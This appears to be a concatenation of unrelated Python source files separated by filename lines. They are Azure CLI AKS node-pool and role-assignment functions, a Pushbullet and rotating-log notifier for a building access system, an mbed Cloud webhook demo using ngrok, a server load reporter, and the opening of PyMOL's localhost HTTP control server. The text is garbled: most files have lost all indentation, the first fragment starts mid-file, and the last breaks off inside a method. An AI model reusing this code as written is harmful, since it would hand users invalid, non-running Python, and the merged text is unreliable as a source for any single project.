def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error(
"Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
# legacy: dev space command
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (
ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
def aks_agentpool_add(
cmd,
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version=None,
node_vm_size=None,
os_type=None,
os_sku=None,
snapshot_id=None,
vnet_subnet_id=None,
pod_subnet_id=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
enable_cluster_autoscaler=False,
min_count=None,
max_count=None,
node_count=3,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float("nan"),
labels=None,
tags=None,
node_taints=None,
node_osdisk_type=None,
node_osdisk_size=0,
max_surge=None,
mode=CONST_NODEPOOL_MODE_USER,
scale_down_mode=CONST_SCALE_DOWN_MODE_DELETE,
max_pods=0,
zones=None,
ppg=None,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
enable_fips_image=False,
kubelet_config=None,
linux_os_config=None,
no_wait=False,
aks_custom_headers=None,
):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
# decorator pattern
from azure.cli.command_modules.acs.agentpool_decorator import AKSAgentPoolAddDecorator
from azure.cli.command_modules.acs._consts import AgentPoolDecoratorMode
aks_agentpool_add_decorator = AKSAgentPoolAddDecorator(
cmd=cmd,
client=client,
raw_parameters=raw_parameters,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
agentpool_decorator_mode=AgentPoolDecoratorMode.STANDALONE,
)
try:
# construct agentpool profile
agentpool = aks_agentpool_add_decorator.construct_agentpool_profile_default()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to add a real agentpool
return aks_agentpool_add_decorator.add_agentpool(agentpool)
def aks_agentpool_update(
cmd,
client,
resource_group_name,
cluster_name,
nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None,
max_count=None,
labels=None,
tags=None,
node_taints=None,
max_surge=None,
mode=None,
scale_down_mode=None,
no_wait=False,
aks_custom_headers=None,
):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
# decorator pattern
from azure.cli.command_modules.acs.agentpool_decorator import AKSAgentPoolUpdateDecorator
from azure.cli.command_modules.acs._consts import AgentPoolDecoratorMode
aks_agentpool_update_decorator = AKSAgentPoolUpdateDecorator(
cmd=cmd,
client=client,
raw_parameters=raw_parameters,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
agentpool_decorator_mode=AgentPoolDecoratorMode.STANDALONE,
)
try:
# update agentpool profile
agentpool = aks_agentpool_update_decorator.update_agentpool_profile_default()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to update the real agentpool
return aks_agentpool_update_decorator.update_agentpool(agentpool)
def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
nodepool_name,
kubernetes_version='',
node_image_only=False,
max_surge=None,
no_wait=False,
aks_custom_headers=None,
snapshot_id=None):
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings', operation_group='agent_pools')
if kubernetes_version != '' and node_image_only:
raise CLIError(
'Conflicting flags. Upgrading the Kubernetes version will also '
'upgrade node image version. If you only want to upgrade the '
'node version please use the "--node-image-only" option only.'
)
# Note: we exclude this option because node image upgrade can't accept nodepool put fields like max surge
if max_surge and node_image_only:
raise MutuallyExclusiveArgumentError(
            'Conflicting flags. Unable to specify max-surge with node-image-only. '
'If you want to use max-surge with a node image upgrade, please first '
'update max-surge using "az aks nodepool update --max-surge".'
)
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name,
snapshot_id)
# load model CreationData
from azure.cli.command_modules.acs.decorator import AKSModels
CreationData = AKSModels(cmd, ResourceType.MGMT_CONTAINERSERVICE).CreationData
creationData = None
if snapshot_id:
snapshot = get_snapshot_by_snapshot_id(cmd.cli_ctx, snapshot_id)
if not kubernetes_version and not node_image_only:
kubernetes_version = snapshot.kubernetes_version
creationData = CreationData(
source_resource_id=snapshot_id
)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
instance.creation_data = creationData
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
# custom headers
aks_custom_headers = extract_comma_separated_string(
aks_custom_headers,
enable_strip=True,
extract_kv=True,
default_value={},
allow_appending_values_to_same_key=True,
)
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
headers=aks_custom_headers,
)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_nodepool_snapshot_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
snapshot_name,
nodepool_id,
location=None,
tags=None,
aks_custom_headers=None,
no_wait=False):
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# load model CreationData, Snapshot
from azure.cli.command_modules.acs.decorator import AKSModels
CreationData = AKSModels(cmd, ResourceType.MGMT_CONTAINERSERVICE).CreationData
Snapshot = AKSModels(cmd, ResourceType.MGMT_CONTAINERSERVICE).Snapshot
creationData = CreationData(
source_resource_id=nodepool_id
)
snapshot = Snapshot(
name=snapshot_name,
tags=tags,
location=location,
creation_data=creationData
)
# custom headers
aks_custom_headers = extract_comma_separated_string(
aks_custom_headers,
enable_strip=True,
extract_kv=True,
default_value={},
allow_appending_values_to_same_key=True,
)
return client.create_or_update(resource_group_name, snapshot_name, snapshot, headers=aks_custom_headers)
def aks_nodepool_snapshot_show(cmd, client, resource_group_name, snapshot_name): # pylint: disable=unused-argument
snapshot = client.get(resource_group_name, snapshot_name)
return snapshot
def aks_nodepool_snapshot_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
snapshot_name,
no_wait=False,
yes=False):
    msg = 'This will delete the snapshot "{}" in resource group "{}". Are you sure?'.format(snapshot_name, resource_group_name)
if not yes and not prompt_y_n(msg, default="n"):
return None
return client.delete(resource_group_name, snapshot_name)
def aks_nodepool_snapshot_list(cmd, client, resource_group_name=None): # pylint: disable=unused-argument
if resource_group_name is None or resource_group_name == '':
return client.list()
return client.list_by_resource_group(resource_group_name)
# TODO: remove in cli June release
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None, is_service_principal=True):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False, is_service_principal=is_service_principal)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
# TODO: remove in cli June release
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None, is_service_principal=True):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope,
is_service_principal=is_service_principal)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
# TODO: remove in cli June release
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups,
is_service_principal=True):
assignee_object_id = None
if assignee:
if is_service_principal:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
else:
assignee_object_id = assignee
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
# TODO: remove in cli June release
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
# TODO: remove in cli June release
def _ensure_aks_acr_role_assignment(cmd,
assignee,
registry_id,
detach=False,
is_service_principal=True):
if detach:
if not _delete_role_assignments(cmd.cli_ctx,
'acrpull',
assignee,
scope=registry_id,
is_service_principal=is_service_principal):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cmd,
'acrpull',
assignee,
scope=registry_id,
is_service_principal=is_service_principal):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
# TODO: remove in cli June release
def _ensure_aks_acr(cmd,
assignee,
acr_name_or_id,
subscription_id,
detach=False,
is_service_principal=True):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cmd.cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cmd, assignee, registry.id, detach, is_service_principal)
return
    # Check if the ACR exists by name across all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cmd.cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cmd, assignee, registry.id, detach, is_service_principal)
return
# TODO: remove in cli June release
# deprecated, see postprocessing_after_mc_created in managed_cluster_decorator.py
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
    # some addons require post-cluster-creation role assignment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
poller = client.begin_create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
        # Grant vnet permission to the system-assigned identity RIGHT AFTER
        # the cluster is put; this can reduce the latency for the
        # role assignment to take effect
if need_grant_vnet_permission_to_cluster_identity:
instant_cluster = client.get(resource_group_name, name)
if not _add_role_assignment(cmd, 'Network Contributor',
instant_cluster.identity.principal_id, scope=vnet_subnet_id,
is_service_principal=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(poller)
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
                logger.warning('Your cluster was created successfully, but we failed to attach '
                               'the ACR to it. You can manually grant permission to the identity '
                               'named <CLUSTER_NAME>-agentpool in the MC_ resource group to give '
                               'it permission to pull from ACR.')
else:
kubelet_identity_object_id = cluster.identity_profile["kubeletidentity"].object_id
_ensure_aks_acr(cmd,
assignee=kubelet_identity_object_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id,
is_service_principal=False)
else:
cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
return cluster
|
LogAndPBMessager.py
|
from pushbullet import PushBullet
import logging, logging.handlers
import threading
from time import localtime, strftime, sleep
from requests import ConnectionError
import OpenSSL
class PushbulletMessenger(object):
def __init__(self, api_token, channel_name):
self.channel_name = channel_name
self.api_token = api_token
self.pb_connected = False
try:
self.pb = PushBullet(self.api_token)
except ConnectionError as e:
#print "Retrying PB loop"
print "PB connection error - not connecting today.."
#TODO: figure out how to get PB to reconnect - thread isn't working!
#self.retry_connect_pushbullet()
else:
print "PB connected"
self.pb_connected = False
self.setup_pb()
self.pending_messages = []
thread = threading.Thread(target=self.message_loop, args=())
thread.daemon = True
thread.start()
self._send('HHS Access Start-up', 'Yep, I\'m working.')
# on successful connect, setup PB
def setup_pb(self):
self.channel = self.pb.channels[0]
channel_found = False
for channel in self.pb.channels:
if channel.name == self.channel_name:
channel_found = True
self.channel = channel
print("Channel " + self.channel_name + " found")
if not channel_found:
print("Channel: " + self.channel_name + " not found.")
# try to send messages
def message_loop(self):
while True:
if self.pb_connected:
if len(self.pending_messages) > 0:
backup = (title, content) = self.pending_messages.pop()
try:
self.channel.push_note(title, content)
except ConnectionError as e:
print("Error sending message, trying again..")
self.pending_messages.append(backup)
except OpenSSL.SSL.SysCallError as e:
self.pending_messages.append(backup)
sleep(2)
# retry PB in a thread..
def retry_pb_thread(self):
while not self.pb_connected:
try:
self.pb = PushBullet(self.api_token)
except ConnectionError as e:
print "PB connection error"
self.error("PB Connection error")
else:
print "PB connected now"
self.pb_connected = True
self.setup_pb()
#self._send('PB connected after error..')
sleep(2)
# Start thread to retry PB connection
def retry_connect_pushbullet(self):
thread = threading.Thread(target=self.retry_pb_thread, args=())
thread.daemon = True
thread.start()
def _send(self, title, content):
self.pending_messages.append((title, content))
def _get_time(self):
return strftime("%a, %d %b %Y %H:%M:%S", localtime())
def test_message(self, message):
self._send("HHS Test Message", message)
def new_occupant(self, member):
self._send("HHS New Occupant", member + " entered at " + self._get_time())
def invalid_tag_attempts(self, tag_id, member):
self._send("HHS repeat tag fail", "Tag ID: " + str(tag_id) + " name: " + member)
def alarm_armed(self, last_entrant):
self._send("HHS Alarm Armed", "Alarm armed at " + self._get_time() + " last occupant scanned: "
+ last_entrant)
def alarm_sounding(self):
self._send("ALARM! at HHS", "Alarm is currently sounding. Might want to check it out.")
def error(self, message):
self._send("HHS Access ERROR", message)
class access_logger():
def __init__(self, log_filename, log_filesize, log_backup_count):
self.entrant_logger = logging.getLogger('EntrantLogger')
self.entrant_logger.setLevel(logging.INFO)
FORMAT = "%(asctime)-15s %(message)s"
logging.basicConfig(format=FORMAT)
self.formatter = logging.Formatter("%(asctime)s;%(message)s")
self.rot_handler = logging.handlers.RotatingFileHandler(log_filename,
maxBytes=log_filesize,
backupCount=log_backup_count)
self.rot_handler.setFormatter(self.formatter)
self.entrant_logger.addHandler(self.rot_handler)
def new_occupant(self, member):
self.entrant_logger.info(member + " entered the building.")
def invalid_tag(self, rfid, member):
self.entrant_logger.info("Invalid tag scanned: " + str(rfid) + " member?: " + member)
def invalid_tag_retries(self, rfid, member):
self.entrant_logger.info("Multiple invalid tag attempts, notifying via Pushbullet..")
def alarm_armed(self):
self.entrant_logger.info("Alarm armed.")
def alarm_sounding(self):
self.entrant_logger.error("Alarm has been triggered and is sounding!!")
def info(self, message):
self.entrant_logger.info(message)
def error(self, message):
self.entrant_logger.error(message)
class LogAndPBMessager():
def __init__(self, pb_token, pb_channel, log_filename, log_filesize, log_backup_count):
self.pb = PushbulletMessenger(pb_token, pb_channel)
self.logger = access_logger(log_filename, log_filesize, log_backup_count)
self.last_occupant = "No-one"
def new_occupant(self, member):
self.pb.new_occupant(member)
self.logger.new_occupant(member)
self.last_occupant = member
def invalid_tag(self, rfid_tag, member):
self.logger.invalid_tag(rfid_tag, member)
def invalid_tag_retries(self, rfid_tag, member):
self.logger.invalid_tag_retries(rfid_tag, member)
self.pb.invalid_tag_attempts(rfid_tag, member)
def alarm_armed(self):
self.logger.alarm_armed()
self.pb.alarm_armed(self.last_occupant)
def alarm_sounding(self):
self.logger.alarm_sounding()
self.pb.alarm_sounding()
def info(self, message):
self.logger.info(message)
def error(self, message):
self.logger.error(message)
self.pb.error(message)
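# Minimal usage sketch with placeholder values (the token, channel and log settings
# below are assumptions, not real configuration): wire up the combined
# logger/notifier and record a couple of events.
if __name__ == "__main__":
    messager = LogAndPBMessager(pb_token="YOUR_PUSHBULLET_TOKEN",   # placeholder token
                                pb_channel="hhs-access",            # example channel name
                                log_filename="access.log",
                                log_filesize=1024 * 1024,
                                log_backup_count=3)
    messager.new_occupant("Example Member")
    messager.info("Usage sketch finished.")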
|
webhook_ngrok.py
|
# ---------------------------------------------------------------------------
# Pelion Device Management SDK
# (C) COPYRIGHT 2017 Arm Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# --------------------------------------------------------------------------
"""Example showing extended usage of the webhook functionality.
== What's happening here?
This example implements the following sequence:
(each column is a thread of control)
|app thread| |server thread| |mbed cloud|
register webhook
webhook created
request resource value
value requested
asyncid stored
wait for value
- - -
a value appears!
trigger webhook
webhook received
notify SDK
value received
== Prerequisites
Two third-party tools are used in this example:
- hug: a simple python3 webserver
- ngrok: a tool to tunnel public http requests to localhost
(because webhook urls must be on the public internet
and presumably your development machine isn't...)
Other providers are available, such as https://localtunnel.github.io
== Instructions
- Install python libraries: `pip install ngrok hug`
- Install ngrok from https://ngrok.com/
- Follow the ngrok documentation to configure a tunnel:
- `ngrok http 8000`
- Run this Python SDK example in a terminal with the following command:
- `hug -f examples/webhook_ngrok.py https://YOUR_NGROK_ID_GOES_HERE.ngrok.io`
- Visit `https://YOUR_NGROK_ID_GOES_HERE.ngrok.io/start` to initiate the sequence
(use a GET request or point your web browser at this url)
- View the result of the application in the terminal
"""
# an example: using a webhook for handling notifications from mbed cloud
from mbed_cloud.connect import ConnectAPI
import hug
import os
import sys
import threading
import traceback
# we must disable automatic creation of a long-poll thread
# as webhooks and long polling are mutually exclusive on mbed cloud
api = ConnectAPI(dict(autostart_notification_thread=False))
ngrok_url = sys.argv[-1] if len(sys.argv) == 4 else (
os.environ.get('NGROK_URL') or
'https://YOUR_NGROK_ID_GOES_HERE.ngrok.io'
)
os.environ['NGROK_URL'] = ngrok_url
resource_path = "/3/0/2"
def my_application(api):
"""An example application.
- Registers a webhook with mbed cloud services
- Requests the value of a resource
- Prints the value when it arrives
"""
device = api.list_connected_devices().first()
print('using device #', device.id)
api.delete_device_subscriptions(device.id)
try:
print('setting webhook url to:', ngrok_url)
api.update_webhook(ngrok_url)
print('requesting resource value for:', resource_path)
deferred = api.get_resource_value_async(device_id=device.id, resource_path=resource_path)
print('waiting for async #', deferred.async_id)
result = deferred.wait(15)
print('webhook sent us this payload value:', repr(result))
return result
except Exception:
print(traceback.format_exc())
finally:
api.delete_webhook()
print("Deregistered and unsubscribed from all resources. Exiting.")
exit(1)
@hug.put('/', parse_body=False)
def webhook_handler(request):
"""Receives the webhook from mbed cloud services
Passes the raw http body directly to mbed sdk, to notify that a webhook was received
"""
body = request.stream.read(request.content_length or 0).decode('utf8')
print('webhook handler saw:', body)
api.notify_webhook_received(payload=body)
# nb. protected references are not part of the API.
# this is just to demonstrate that the asyncid is stored
print('key store contains:', api._db.keys())
@hug.get('/start')
def start_sequence():
"""Start the demo sequence
We must start this thread in the same process as the webserver to be certain
we are sharing the api instance in memory.
(ideally in future the async id database will be capable of being more than
just a dictionary)
"""
print('getting started!...')
t = threading.Thread(target=my_application, kwargs=dict(api=api))
t.daemon = True
t.start()
return 'ok, starting webhook to: %s' % (ngrok_url,)
# end of example
|
vms_report.py
|
# coding: utf-8
#------------------------------
# Reporting from the [slave] server
#------------------------------
import sys
import os
import json
import time
import threading
import subprocess
import shutil
sys.path.append("/usr/local/lib/python2.7/site-packages")
import psutil
root_dir = os.getcwd()
sys.path.append(root_dir + "/class/core")
reload(sys)
sys.setdefaultencoding('utf-8')
import db
import common
#------------Private Methods--------------
def updateStatus(sid, status):
common.M('video_tmp').where(
"id=?", (sid,)).setField('status', status)
def isMasterNode():
run_model = common.getSysKV('run_model')
run_is_master = common.getSysKV('run_is_master')
if (run_model == '1') or (run_is_master == '1'):
return True
return False
#------------Private Methods--------------
def reportData(data):
_list = common.M('node').field('id,port,name,ip').where(
'ismaster=?', (1,)).select()
if len(_list) > 0:
_url = "http://" + str(_list[0]['ip']) + \
":" + str(_list[0]['port'])
api_url = _url + "/async_master_api/reportData"
ret = common.httpPost(api_url, {
"mark": common.getSysKV('run_mark'),
"data": data,
'name': _list[0]['name']
})
rr = json.loads(ret)
return rr
def pingServer():
_list = common.M('node').field('id,port,name,ip').select()
for x in xrange(0, len(_list)):
_url = "http://" + str(_list[x]['ip']) + \
":" + str(_list[x]['port'])
api_url = _url + "/async_master_api/ping"
try:
ret = common.httpPost(api_url, {
"mark": common.getSysKV('run_mark'),
'name': _list[x]['name']
})
rr = json.loads(ret)
if rr['code'] == 0:
common.M('node').where(
'name=?', (_list[x]['name'],)).setField('status', 1)
except Exception as e:
common.M('node').where(
'name=?', (_list[x]['name'],)).setField('status', 0)
return True
def serverReport():
time_sleep = 3
while True:
if isMasterNode():
time.sleep(time_sleep)
continue
c = os.getloadavg()
data = {}
data['one'] = float(c[0])
data['five'] = float(c[1])
data['fifteen'] = float(c[2])
data['max'] = psutil.cpu_count() * 2
data['limit'] = data['max']
data['safe'] = data['max'] * 0.75
data['report_time'] = common.getDate()
r = reportData(data)
if r['code'] != 0:
            print('Sync failed! [%s]' % common.getDate())
time.sleep(time_sleep)
def serverPing():
while True:
pingServer()
time.sleep(3)
def startTask():
import time
try:
while True:
time.sleep(2)
except:
time.sleep(60)
startTask()
if __name__ == "__main__":
t = threading.Thread(target=serverReport)
t.setDaemon(True)
t.start()
t = threading.Thread(target=serverPing)
t.setDaemon(True)
t.start()
startTask()
|
pymolhttpd.py
|
# Copyright (C) Schrodinger, LLC.
# All Rights Reserved
#
# For more information, see LICENSE in PyMOL's home directory.
#
# pymolhttpd.py
#
# web server interface for controlling PyMOL
from __future__ import print_function
from __future__ import absolute_import
# we make extensive use of Python's built-in web infrastructure
import sys
_PY3 = sys.version_info[0] > 2
if _PY3:
import http.server as BaseHTTPServer
import io as StringIO
import urllib.parse as urlparse
from urllib.request import urlopen
else:
import BaseHTTPServer
import StringIO
import urlparse
from urllib import urlopen
import cgi
import socket
# we also rely upon Python's json infrastructure
try:
import simplejson as json
except:
import json
# standard Python dependencies
import types, os, sys, traceback, threading
# NOTE: Let's attempt to follow Python PEP 8 for coding style for this
# source code file. URL: http://www.python.org/de/peps/pep-0008
#
# * maximum target line length to be 79 characters.....................seventy9
# * methods and attribute names as lower_case_underscore
# * class names as UpperCaseCaps
# * private symbols start with a leading underscore
# * uniform indentation consisting of 4 spaces (no tabs!)
_json_mime_types = [ 'text/json', 'application/json' ]
class _PymolHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
# for now, we're using a single-threaded server
# our actual HTTP server class is private for the time being
# if we need to, then we'll change this
def wfile_write(self, s):
if _PY3 and not isinstance(s, bytes):
s = s.encode('utf-8')
self.wfile.write(s)
def do_GET(self):
self.process_request()
def do_POST(self):
self.process_request()
def log_message(self, format, *args):
if self.server.pymol_logging:
BaseHTTPServer.BaseHTTPRequestHandler.log_message(self,format,
*args)
def process_request(self):
"""
parse any URL or FORM arguments and process the request
"""
# verify that the request is coming from this machine
try:
host, port = self.client_address
if (host[0:6] != '127.0.'):
self.send_error(403,
"Only localhost requests are allowed (not: %s)"
% host)
else:
self.session = self.server.pymol_session # local session
self.callback = None
self.parse_args()
self.process_urlpath()
except socket.error:
traceback.print_exc()
print("broken pipe")
pass
def parse_args(self):
"""
parses URL arguments into a urlpath (before the ?)
and a cgiFieldStorage object (args after the ?).
for example:
http://localhost:8080/apply/pymol.cmd.color?color=blue&selection=benz
would yield self.fs.getvalue("color") as "blue"
and self.fs.getvalue("selection") as "benz"
self.urlpath would be "/apply/pymol.cmd.color"
"""
if (self.command == "POST"):
self.fs = cgi.FieldStorage(fp=self.rfile, headers=self.headers,
environ = {'REQUEST_METHOD':'POST'},
keep_blank_values = 1)
self.urlpath = self.path
elif (self.command == "GET"):
scheme,netloc,path,params,qs,fragment = urlparse.urlparse(self.path)
self.fs = cgi.FieldStorage(environ = {'REQUEST_METHOD':'GET',
'QUERY_STRING':qs},
keep_blank_values = 1)
self.urlpath = path
else:
self.fs = None
def process_urlpath(self):
"""
self.urlpath can be a request for a document, or a
special request, such as apply or getattr
"""
parts = self.urlpath.split('/')
# for example:
# if http://localhost:8080/apply/pymol.cmd.color?...
# then parts is ['', 'apply', 'pymol.cmd.color...']
# or if http://localhost:8080/apply?_json=...
# then parts is ['', 'apply?_json=...']
if len(parts) < 2: # then it cannot be a PyMOL request
self.send_doc() # simple file retrieval
else: # might be a PyMOL request
if len(parts) == 2: # no method name or trailing slash -> blank
parts.append('')
if (parts[1] == 'apply'): # calling a method
self.pymol_apply(parts[2])
elif (parts[1] == 'getattr'): # retrieving a property
self.pymol_getattr(parts[2])
elif (parts[1] == 'echo'): # for debugging purposes
self.send_resp_header(200,'text/plain')
self.echo_args(parts[2])
else: # simple file retrieval
self.send_doc()
def pymol_getattr(self, attr):
"""
apply the repr method to the requested attr, but only for
allowed attributes - those stored in the session dictionary
"""
key = '/getattr/' + attr;
if key in self.session:
try:
result = repr(self.session[key])
self.send_json_result(result)
except:
self.send_error(500,"Unable to get attribute.")
self.wfile_write(" %s\n" % attr)
traceback.print_exc(file=self.wfile)
else:
self.send_error(404,"Not a recognized attribute")
self.wfile_write(" %s is not a recognized attribute\n" % attr)
def wrap_return(self, result, status="OK", indent=None):
r = { 'status' : status, 'result' : result }
if self.server.wrap_natives==1:
return json.dumps(r, indent=indent)
else:
return json.dumps(result, indent=indent)
def send_json_result(self, result):
"""
send the mime header and result body. requests that came from
XMLHTTPRequest have specified they will accept (expect) json
formatted results. other requests will have come from
ordinary GET or POST requests via links or forms
"""
if self.callback is not None:
